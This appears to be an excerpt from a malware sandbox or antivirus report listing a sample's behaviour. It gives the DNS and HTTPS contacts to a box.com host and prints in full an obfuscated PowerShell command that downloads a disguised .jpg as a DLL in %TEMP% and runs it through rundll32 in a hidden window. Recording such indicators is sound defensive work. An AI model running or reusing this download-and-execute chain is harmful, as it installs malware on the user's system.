Technical Information
- https://moroconfortoltdame.box.com/shared/static/bvukbse33im2e9ymokxhwf70dh3s8a0z.jpg as %temp%\bzzcqhzgtl_user_hgfoq.dll
- 'mo######ortoltdame.box.com':443
- 'mo######ortoltdame.box.com':443
- DNS ASK mo######ortoltdame.box.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (new-obJect systeM.net.webcLIent).downLoadfILe('""https://moroconfortoltdame.box.com/shared/static/bvukbse33im2e9ymokxhwf70dh3s8a0z.jpg','%TEMP%\bzzcqhzgtl_user_hgfoq.dLL');start-process rundLL...' (with hidden window)
- '<SYSTEM32>\rundll32.exe' %TEMP%\bzzcqhzgtl_user_hgfoq.dLL starter